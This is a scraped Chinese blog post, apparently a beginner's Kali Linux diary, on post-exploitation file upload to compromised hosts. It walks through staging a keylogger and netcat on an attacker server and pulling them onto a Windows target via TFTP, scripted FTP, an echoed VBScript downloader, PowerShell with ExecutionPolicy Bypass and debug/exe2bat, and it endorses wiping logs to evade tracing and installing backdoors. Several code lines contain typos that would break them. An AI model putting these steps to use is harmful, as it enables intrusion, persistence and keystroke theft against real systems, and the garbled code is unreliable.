1. 程式人生 > >小白日記20:kali滲透測試之後滲透測試階段(一)--上傳工具

小白日記20:kali滲透測試之後滲透測試階段(一)--上傳工具

後滲透測試階段--上傳工具

為防止管理員將漏洞補上後,我們無法再通過該漏洞控制對方主機,所以需要進行後滲透測試階段

1、上傳各種工具

2、提權:為了全面控制目標系統

3、擦除攻擊痕跡:防止管理員通過日誌溯源追蹤,發現攻擊源頭【除了系統日記,應用程式也會有自己的日誌資訊】

##刪除系統日記和應用程式日記

例如:SLmail中

4、安裝後門程式

實現長期控制,Dump密碼,作為跳板進行內網滲透【大部分情況下,比公網滲透簡單】

注:後滲透利用階段

最大的挑戰:防病毒軟體【根據病毒特徵庫進行查殺】。所以我們需要使用合法的遠端控制軟體(NC)【儘量做到免殺,但也有可能在防病毒軟體更新特徵庫後,被檢測出來】

上傳工具

目的:持久控制,擴大對目標系統的控制能力

Linux系統

linux系統下實現上傳工具比較容易,因為其預設安裝netcat、curl、wget,即使沒有安裝netcat,也可以輕易地使用curl和wget去黑客共享的伺服器下載安裝木馬、netcat等【curl和wget一定會在linux系統下預設安裝】

Windows系統

相對來說,windows系統下缺少預裝工具,難以進行木馬等工具的下載

getshell後,windows系統下載木門工具例項

根據小白日記17,getshell【此為類NC遠端控制shell,是一種非互動型的shell(即該命令列視窗下必須輸入完整的命令,無法tab鍵補全)】


在windows系統下安裝ftp軟體,體驗非互動型shell的壞處,添加/刪除元件中【appwiz.cpl】【需插入光碟】




因此我們必須上傳一些能提供互動型的木馬程式【灰鴿子等】

上傳工具姿勢

1、使用TFTP傳輸檔案【構造一個TFTP伺服器,在伺服器中放置工具木馬等,再通過被控端連線下載】

XP、2003中預設安裝,Win7、2008以後的系統需要單獨新增,但經常被邊界防火牆過濾。主流為FTP,是因為基於UDP協議,明文傳輸,不支援身份驗證

利用kali

mkdir /tftp   #建立tftp目錄

chown -R nobody 設定許可權所有者為nobody【無本地登入許可權】

cp /usr/share/windows-binaries/whoami.exe /tftp/       #windows下檢視當前使用者

cp /usr/share/windows-binaries/klogger.exe /tftp/       #拷貝鍵盤記錄器


atftpd --daemon --port 69 /tftp/              #daemon,用後臺方式啟動,主目錄指向tftp

由於許可權問題,會出現以下這個常見問題【啟動程序不是tftp】


需kill 543這個程序,使用chown -R nobody /tftp/   【將所有者改成nobody】


重啟服務


進到shell視窗,檢視tftp


進行tftp檔案傳輸


tasklist  #檢視程序


鍵盤記錄器會記錄管理員的輸入,再同目錄下會生成記錄鍵盤輸入的文字檔案


type klogger


2、使用FTP傳輸

先在kali上apt-get install pure-ftpd

使用指令碼配置【切記:設定的密碼,下面echo會用到】

#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd yuanfh -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/                   #建立的ftp主目錄
/etc/init.d/pure-ftpd restart
驗證ftp

因為非互動系統中,ftp傳輸,在password命令處無法顯示,所以需要通過轉換思路進行下載

思路:【將要實現的命令寫到目標伺服器的文字檔案中,用ftp讀取文字檔案的命令進行下載】
C:\>echo open 192.168.1.127 21>ftp.txt
echo open 192.168.1.127 21>ftp.txt

C:\>echo yuanfh>>ftp.txt
echo yuanfh>>ftp.txt

C:\>echo password>>ftp.txt
echo password>>ftp.txt

C:\>echo bin>>ftp.txt
echo bin>>ftp.txt

C:\>echo GET whoami.exe >> ftp.txt
echo GET whoami.exe >> ftp.txt

C:\>echo GET klogger.exe >> ftp.txt
echo GET klogger.exe >> ftp.txt

C:\>echo bye >> ftp.txt
echo bye >> ftp.txt
##先將whoami,klogger等程式拷貝到ftphome目錄【cp /tftp/* /ftphome/】
ftp -s:ftp.txt


3、使用VBSCRIRT傳輸檔案

#VBS是windows系統上預設的解釋型指令碼語言,在win7後增加了perl

##通過web程式,http協議下載遠端控制程式,需在kali啟動apache2

[email protected]:~# service apache2 start
[email protected]:~# netstat -pantu | grep :80
tcp6       0      0 :::80                   :::*                    LISTEN      4433/apache2      

進入apache2預設目錄,拷貝檔案

[email protected]:~# cd /var/www/html
[email protected]:/var/www/html# cp /ftphome/* .
[email protected]:/var/www/html# ls
index.html  klogger.exe  whoami.exe
[email protected]:/var/www/html# 
貼上以下命令到shell視窗
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXSEITTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXSEITTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXSEITTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXSEITTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Noting Then Set http = CreateObjiect("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Noting Then Set http = CreateObjiect("WinHttp.MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Noting Then Set http = CreateObjiect("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Noting >> wget.vbs
echo Set fs = CreateObject("Scrippting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Miidb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
cscript wget.vbs http://192.168.1.127/whoami.exe w.exe  

【windows系統自帶的cscipt命令去下載whoami.exe 命名成w.exe,傳輸完成後,需重啟一下目標系統】

4、使用POWERSHELL傳輸檔案  【到目標伺服器下載程式】

##需在windows系統下執行

$strongeDir = $pwd
$webclient = New-Object System.Net.WebClient
$url = "http://192.168.1.127/whoami.exe"
$file = "new-exsploit.exe"
$webclient DownloadFile($url,$file)

powershell.exe -ExecutionPolicy Bypass  -NoLogo -Nonlnteractive -Noprofile -File wget.ps1

5、使用DEBUG傳輸檔案

Debug是一種彙編、反彙編的16進位制dump工具,作為檔案傳輸,預設情況下只能傳輸64k位元組的資料

一、使用upx壓縮檔案進行壓縮再進行傳輸

cp /usr/share/windows-binaries/nc.exe .   #拷貝nc到根目錄

[email protected]:~# upx -9 nc.exe                          #-9:最高程度壓縮
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2013
UPX 3.91        Markus Oberhumer, Laszlo Molnar & John Reiser   Sep 30th 2013

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     59392 ->     29184   49.14%    win32/pe     nc.exe                        

Packed 1 file.
二、將exe程式轉化成16進位制文字格式

wine /usr/share/windows-binaries/exe2bat.exe nc.exe nc.txt
將文字檔案中的16進位制程式碼(除倒數兩行外)全部複製到shell視窗中

debug<123.hex      #生成1.dll

copy 1.dlll nc.exe     

相關推薦

日記20kali滲透測試之後滲透測試階段--工具

後滲透測試階段--上傳工具 為防止管理員將漏洞補上後,我們無法再通過該漏洞控制對方主機,所以需要進行後滲透測試階段 1、上傳各種工具 2、提權:為了全面控制目標系統 3、擦除攻擊痕跡:防止管理員通過

日記36kali滲透測試之Web滲透-手動漏洞挖掘-突破身份認證,作業系統任意命令執行漏洞

手動漏洞挖掘 ###################################################################################### 手動漏洞挖掘

日記10kali滲透測試之埠掃描-UDP、TCP、殭屍掃描、隱蔽掃描

埠掃描 二三四層發現的目的只是為了準確發現所有活著主機IP,確定攻擊面,埠掃描即發現攻擊點,發現開放埠。埠對應網路服務及應用端程式,服務端程式的漏洞通過埠攻入。【所有的掃描結果,都不要完全相信】 一

日記30kali滲透測試之Web滲透-掃描工具-Skipfish

WEB滲透-skipfish Skipfish是一個命令列模式,以C語言編寫的積極的Web應用程式的安全性偵察工具,沒有代理模式。 它準備了一個互動為目標的網站的站點地圖進行一個遞迴爬網和基於字典的探

日記11kali滲透測試之服務掃描-banner、dmitry、nmap特徵庫、作業系統識別、SNMP

<strong>[email protected]:~# xprobe2 192.168.1.115 </strong> Xprobe2 v.0.3 Copyright (c) 2002-2005 [email protected], [email pro

日記29kali滲透測試之Web滲透-掃描工具-Vega

WEB掃描工具-Vega  純圖形化介面,Java編寫的開源web掃描器。兩種工作模式:掃描模式和代理模式【主流掃描功能】。用於爬站。處理表單,注入測試等。支援SSL:http://vega/ca.c

日記12kali滲透測試之服務掃描-SMB掃描

SMB掃描 Server Message Block 協議。與其他標準的TCP/IP協議不同,SMB協議是一種複雜的協議,因為隨著Windows計算機的開發,越來越多的功能被加入到協議中去了,很難區分哪些概念和功能應該屬於Windows作業系統本身,哪些概念應該屬於SMB

日記18kali滲透測試之緩衝區溢位例項二)--Linux,穿越火線1.9.0

Linux系統下穿越火線-緩衝區溢位 原理:crossfire 1.9.0 版本接受入站 socket 連線時存在緩衝區溢位漏洞。 工具: 除錯工具:edb; ###python在漏洞溢位方面的滲透

日記8kali滲透測試之主動資訊收集三層發現ping、traceroute、scapy、nmap、fping、Hping

 三層發現 三層協議有:IP以及ICMP協議(internet管理協議).icmp的作用是用來實現intenet管理的,進行路徑的發現,網路通訊情況,或者目標主機的狀態;在三層發現中主要使用icmp協

《Web安全攻防滲透測試實戰指南》筆記

前言 這個系列是拜讀《Web安全攻防:滲透測試實戰指南》之後的一些筆記和實踐記錄,感謝作者對我學習過程的幫助,這本書值得大家入手學習。 資訊收集 1.獲取真實IP 繞過CDN尋找目標伺服器的真實IP,如果目標伺服器不存在CDN,可以通過www.i

基礎測試理論與實踐-連載寫的背景與動機

注:本文是原創,轉載麻煩務必註明出處。 我第一次接觸測試的概念,是我大三的一次技術通識課上。 我的學校是一所國家級重點大學,在廣東省更是辦學的佼佼者。雖然我的專業,電腦科學與技術不是S學校的強項,但是我們班有很多同學在校期間就拿了ACM的世界金牌。在這種大牛大神的崇尚學習

OSGi是什麽Java語言的動態模塊系統

平臺 使用 數據 osgi servle http cto 優點 重啟 OSGi是什麽 OSGi亦稱做Java語言的動態模塊系統,它為模塊化應用的開發定義了一個基礎架構。OSGi容器已有多家開源實現,比如Knoflerfish、Equinox和Apache的Felix。您可

快速入門web接口自動化測試---知識與思想準備階段

重要 請求 協議 工具 簡單 目標 多說 tro font 剛換了工作,老板要求我搞接口自動化,可是之前完全沒有搞過,怎麽辦?怎麽辦?答:先把B裝下了,然後學!個人感覺,這是在工作提升自己的最好方式,嘻嘻,鄙人在這裏以日記的形式,記錄自己作為一個技術渣,點點滴滴

《selenium2 python 自動化測試實戰》13——文件

dml 實戰 文件的 -c pbm erl sel png flow 看代碼: # coding: utf-8 from selenium import webdriver from time import sleep driver = webdriver.Fir

MySQL系列基於binlog的增量訂閱與消費

clas 需要 val tro ali cat tor rip 變化   在一些業務場景中,像在數據分析中我們有時候需要捕獲數據變化(CDC);在數據審計中,我們也往往需要知道數據從這個點到另一個點的變化;同樣在實時分析中,我們有時候需要看到某個值得實時變化等。 要解決以上

💒 es6 + canvas 開源 蓋樓遊戲 完整代碼註釋 從零教你做遊戲

lock 基於 時間 git cor 默認 掃描 lin tga 蓋樓遊戲 一個基於 Canvas 的蓋樓遊戲 Demo 預覽 在線預覽地址 (Demo Link) 手機設備可以掃描下方二維碼 github https://github.com/bmqb/to

ROS使用Qt Creator創建GUI程序

編譯錯誤 repl 搜索 AC test ica all Go 5.2.1 開發環境: Ubuntu14.04 ROS indigo version Qt Creator 3.0.1 based on Qt 5.2.1 步驟如下:(按照下面命令一步步來,親測可行) (一)安

微信程序15--圖片公用組件(2)

ide png target 所有 sin cti mon cat out 接下來開始寫寫上傳圖片的公用組件,可以自定義上傳幾張圖片。 chooseImage文件夾裏面的index.wxml和index.js,涉及圖片上傳,刪除,預覽。 <view class="

MyEclipse教程使用UML建立模組庫——第二部分

MyEclipse 線上訂購年終抄底促銷!火爆開搶>> 【MyEclipse最新版下載】 UML2建模檔案儲存在建模儲存庫中,建模可用於生成Java程式碼,或者可以從程式碼生成模型。 本教程介紹如何執行與建模儲存庫相關的任務。 您將學到如何: 建立UML模型儲存庫

ueditor單圖片simpleupload,設置其 width100%,heightauto。以適應各種屏幕大小顯示

適應 () 技術 width png 屏幕大小 bsp 代碼 操作 打開ueditor.all.js,按下圖操作(修改後註意清緩存): 附上待搜索的關鍵字:function callback() 附上代碼   loader.setAttribute(‘width‘